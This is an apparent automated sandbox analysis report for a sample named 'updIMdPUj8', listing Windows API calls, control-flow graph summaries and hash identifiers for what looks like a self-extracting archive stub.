                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                                                                          • String ID: riched20.dll$3Ro
                                                                                                                                                                          • API String ID: 3498096277-3613677438
                                                                                                                                                                          • Opcode ID: 98bbde7d84c645d41726725142b12c05455c72ec028e3e1969916f64c39ab7ee
                                                                                                                                                                          • Instruction ID: c0b51dca1f27899389c9ce319f595f0a42ec7ec485a2fd023120952cf268c4a5
                                                                                                                                                                          • Opcode Fuzzy Hash: 98bbde7d84c645d41726725142b12c05455c72ec028e3e1969916f64c39ab7ee
                                                                                                                                                                          • Instruction Fuzzy Hash: 3BF0FFB1900209ABCB10AFA9D849A9FFBFCEF84B04F104156A815E2251DBB45645CBA1

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00B27760,?,00000005,?,00000011), ref: 00B2995F
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00B27760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B2996C
                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00B27760,?,00000005,?), ref: 00B299A2
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00B27760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B299AA
                                                                                                                                                                          • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00B27760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B299F9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CreateErrorLast$Time
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1999340476-0

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          control_flow_graph 1056 b3b568-b3b581 PeekMessageW 1057 b3b583-b3b597 GetMessageW 1056->1057 1058 b3b5bc-b3b5be 1056->1058 1059 b3b599-b3b5a6 IsDialogMessageW 1057->1059 1060 b3b5a8-b3b5b6 TranslateMessage DispatchMessageW 1057->1060 1059->1058 1059->1060 1060->1058
                                                                                                                                                                          APIs
                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B3B579
                                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B3B58A
                                                                                                                                                                          • IsDialogMessageW.USER32(0001046A,?), ref: 00B3B59E
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 00B3B5AC
                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 00B3B5B6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1266772231-0

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          control_flow_graph 1061 b3abab-b3abca GetClassNameW 1062 b3abf2-b3abf4 1061->1062 1063 b3abcc-b3abe1 call b31fbb 1061->1063 1065 b3abf6-b3abf9 SHAutoComplete 1062->1065 1066 b3abff-b3ac01 1062->1066 1068 b3abe3-b3abef FindWindowExW 1063->1068 1069 b3abf1 1063->1069 1065->1066 1068->1069 1069->1062
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000050), ref: 00B3ABC2
                                                                                                                                                                          • SHAutoComplete.SHLWAPI(?,00000010), ref: 00B3ABF9
                                                                                                                                                                            • Part of subcall function 00B31FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00B2C116,00000000,.exe,?,?,00000800,?,?,?,00B38E3C), ref: 00B31FD1
                                                                                                                                                                          • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00B3ABE9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                                          • String ID: EDIT
                                                                                                                                                                          • API String ID: 4243998846-3080729518

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          control_flow_graph 1070 b3dbde-b3dc09 call b3ec50 SetEnvironmentVariableW call b30371 1074 b3dc0e-b3dc12 1070->1074 1075 b3dc36-b3dc38 1074->1075 1076 b3dc14-b3dc18 1074->1076 1077 b3dc21-b3dc28 call b3048d 1076->1077 1080 b3dc1a-b3dc20 1077->1080 1081 b3dc2a-b3dc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1075
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B3DBF4
                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B3DC30
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EnvironmentVariable
                                                                                                                                                                          • String ID: sfxcmd$sfxpar
                                                                                                                                                                          • API String ID: 1431749950-3493335439

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          control_flow_graph 1082 b29785-b29791 1083 b29793-b2979b GetStdHandle 1082->1083 1084 b2979e-b297b5 ReadFile 1082->1084 1083->1084 1085 b29811 1084->1085 1086 b297b7-b297c0 call b298bc 1084->1086 1087 b29814-b29817 1085->1087 1090 b297c2-b297ca 1086->1090 1091 b297d9-b297dd 1086->1091 1090->1091 1092 b297cc 1090->1092 1093 b297ee-b297f2 1091->1093 1094 b297df-b297e8 GetLastError 1091->1094 1095 b297cd-b297d7 call b29785 1092->1095 1097 b297f4-b297fc 1093->1097 1098 b2980c-b2980f 1093->1098 1094->1093 1096 b297ea-b297ec 1094->1096 1095->1087 1096->1087 1097->1098 1100 b297fe-b29807 GetLastError 1097->1100 1098->1087 1100->1098 1102 b29809-b2980a 1100->1102 1102->1095
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00B29795
                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00B297AD
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00B297DF
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00B297FE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2244327787-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00B43F73,00000000,00000000,?,00B4ACDB,00B43F73,00000000,00000000,00000000,?,00B4AED8,00000006,FlsSetValue), ref: 00B4AD66
                                                                                                                                                                          • GetLastError.KERNEL32(?,00B4ACDB,00B43F73,00000000,00000000,00000000,?,00B4AED8,00000006,FlsSetValue,00B57970,FlsSetValue,00000000,00000364,?,00B498B7), ref: 00B4AD72
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B4ACDB,00B43F73,00000000,00000000,00000000,?,00B4AED8,00000006,FlsSetValue,00B57970,FlsSetValue,00000000), ref: 00B4AD80
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00B2D343,00000001,?,?,?,00000000,00B3551D,?,?,?), ref: 00B29F9E
                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00B3551D,?,?,?,?,?,00B34FC7,?), ref: 00B29FE5
                                                                                                                                                                          • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00B2D343,00000001,?,?), ref: 00B2A011
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite$Handle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4209713984-0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B2C27E: _wcslen.LIBCMT ref: 00B2C284
                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00B2A175,?,00000001,00000000,?,?), ref: 00B2A2D9
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00B2A175,?,00000001,00000000,?,?), ref: 00B2A30C
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,00B2A175,?,00000001,00000000,?,?), ref: 00B2A329
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2260680371-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00B4B8B8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Info
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1807457897-3916222277
                                                                                                                                                                          APIs
                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00B4AFDD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String
                                                                                                                                                                          • String ID: LCMapStringEx
                                                                                                                                                                          • API String ID: 2568140703-3893581201
                                                                                                                                                                          APIs
                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00B4A56F), ref: 00B4AF55
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                          • String ID: InitializeCriticalSectionEx
                                                                                                                                                                          • API String ID: 2593887523-3084827643
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Alloc
                                                                                                                                                                          • String ID: FlsAlloc
                                                                                                                                                                          • API String ID: 2773662609-671089009
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3EAF9
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: 3Ro
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B4B7BB: GetOEMCP.KERNEL32(00000000,?,?,00B4BA44,?), ref: 00B4B7E6
                                                                                                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00B4BA89,?,00000000), ref: 00B4BC64
                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,00B4BA89,?,?,?,00B4BA89,?,00000000), ref: 00B4BC77
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CodeInfoPageValid
                                                                                                                                                                          • String ID:
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00B29A50,?,?,00000000,?,?,00B28CBC,?), ref: 00B29BAB
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00B28411,-00009570,00000000,000007F3), ref: 00B29BB6
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B497E5: GetLastError.KERNEL32(?,00B61030,00B44674,00B61030,?,?,00B43F73,00000050,?,00B61030,00000200), ref: 00B497E9
                                                                                                                                                                            • Part of subcall function 00B497E5: _free.LIBCMT ref: 00B4981C
                                                                                                                                                                            • Part of subcall function 00B497E5: SetLastError.KERNEL32(00000000,?,00B61030,00000200), ref: 00B4985D
                                                                                                                                                                            • Part of subcall function 00B497E5: _abort.LIBCMT ref: 00B49863
                                                                                                                                                                            • Part of subcall function 00B4BB4E: _abort.LIBCMT ref: 00B4BB80
                                                                                                                                                                            • Part of subcall function 00B4BB4E: _free.LIBCMT ref: 00B4BBB4
                                                                                                                                                                            • Part of subcall function 00B4B7BB: GetOEMCP.KERNEL32(00000000,?,?,00B4BA44,?), ref: 00B4B7E6
                                                                                                                                                                          • _free.LIBCMT ref: 00B4BA9F
                                                                                                                                                                          • _free.LIBCMT ref: 00B4BAD5
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorLast_abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B21E55
                                                                                                                                                                            • Part of subcall function 00B23BBA: __EH_prolog.LIBCMT ref: 00B23BBF
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B21EFD
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog$_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          APIs
                                                                                                                                                                          • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B273BC,?,?,?,00000000), ref: 00B29DBC
                                                                                                                                                                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 00B29E70
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$BuffersFlushTime
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00B29F27,?,?,00B2771A), ref: 00B296E6
                                                                                                                                                                          • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00B29F27,?,?,00B2771A), ref: 00B29716
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00B29EC7
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00B29ED4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00B48E75
                                                                                                                                                                            • Part of subcall function 00B48E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B4CA2C,00000000,?,00B46CBE,?,00000008,?,00B491E0,?,?,?), ref: 00B48E38
                                                                                                                                                                          • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00B61098,00B217CE,?,?,00000007,?,?,?,00B213D6,?,00000000), ref: 00B48EB1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Heap$AllocAllocate_free
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?), ref: 00B310AB
                                                                                                                                                                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 00B310B2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$AffinityCurrentMask
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B2A325,?,?,?,00B2A175,?,00000001,00000000,?,?), ref: 00B2A501
                                                                                                                                                                            • Part of subcall function 00B2BB03: _wcslen.LIBCMT ref: 00B2BB27
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B2A325,?,?,?,00B2A175,?,00000001,00000000,?,?), ref: 00B2A532
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile$_wcslen
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteFileW.KERNELBASE(000000FF,?,?,00B2977F,?,?,00B295CF,?,?,?,?,?,00B52641,000000FF), ref: 00B2A1F1
                                                                                                                                                                            • Part of subcall function 00B2BB03: _wcslen.LIBCMT ref: 00B2BB27
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00B2977F,?,?,00B295CF,?,?,?,?,?,00B52641), ref: 00B2A21F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$_wcslen
                                                                                                                                                                          APIs
                                                                                                                                                                          • GdiplusShutdown.GDIPLUS(?,?,?,?,00B52641,000000FF), ref: 00B3ACB0
                                                                                                                                                                          • CoUninitialize.COMBASE(?,?,?,?,00B52641,000000FF), ref: 00B3ACB5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: GdiplusShutdownUninitialize
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3856339756-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,00B2A23A,?,00B2755C,?,?,?,?), ref: 00B2A254
                                                                                                                                                                            • Part of subcall function 00B2BB03: _wcslen.LIBCMT ref: 00B2BB27
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00B2A23A,?,00B2755C,?,?,?,?), ref: 00B2A280
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile$_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2673547680-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3DEEC
                                                                                                                                                                            • Part of subcall function 00B24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B240A5
                                                                                                                                                                          • SetDlgItemTextW.USER32(00000065,?), ref: 00B3DF03
                                                                                                                                                                            • Part of subcall function 00B3B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B3B579
                                                                                                                                                                            • Part of subcall function 00B3B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B3B58A
                                                                                                                                                                            • Part of subcall function 00B3B568: IsDialogMessageW.USER32(0001046A,?), ref: 00B3B59E
                                                                                                                                                                            • Part of subcall function 00B3B568: TranslateMessage.USER32(?), ref: 00B3B5AC
                                                                                                                                                                            • Part of subcall function 00B3B568: DispatchMessageW.USER32(?), ref: 00B3B5B6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2718869927-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B30836
                                                                                                                                                                          • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B2F2D8,Crypt32.dll,00000000,00B2F35C,?,?,00B2F33E,?,?,?), ref: 00B30858
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1175261203-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B3A3DA
                                                                                                                                                                          • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00B3A3E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BitmapCreateFromGdipStream
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1918208029-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B42BAA
                                                                                                                                                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00B42BB5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1660781231-0
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemShowWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3351165006-0
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B28289
                                                                                                                                                                            • Part of subcall function 00B213DC: __EH_prolog.LIBCMT ref: 00B213E1
                                                                                                                                                                            • Part of subcall function 00B2A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B2A598
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog$CloseFind
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2506663941-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B213E1
                                                                                                                                                                            • Part of subcall function 00B25E37: __EH_prolog.LIBCMT ref: 00B25E3C
                                                                                                                                                                            • Part of subcall function 00B2CE40: __EH_prolog.LIBCMT ref: 00B2CE45
                                                                                                                                                                            • Part of subcall function 00B2B505: __EH_prolog.LIBCMT ref: 00B2B50A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B213E1
                                                                                                                                                                            • Part of subcall function 00B25E37: __EH_prolog.LIBCMT ref: 00B25E3C
                                                                                                                                                                            • Part of subcall function 00B2CE40: __EH_prolog.LIBCMT ref: 00B2CE45
                                                                                                                                                                            • Part of subcall function 00B2B505: __EH_prolog.LIBCMT ref: 00B2B50A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B3B098
                                                                                                                                                                            • Part of subcall function 00B213DC: __EH_prolog.LIBCMT ref: 00B213E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: 5cdb822226d095346558b874d9f02b4141bb483eff5165fb3a50a3a767737d92
                                                                                                                                                                          • Instruction ID: 6ff890e61d311638e28868fc2ff8158510d0e86033d3e73693638d6c587e7ab4
                                                                                                                                                                          • Opcode Fuzzy Hash: 5cdb822226d095346558b874d9f02b4141bb483eff5165fb3a50a3a767737d92
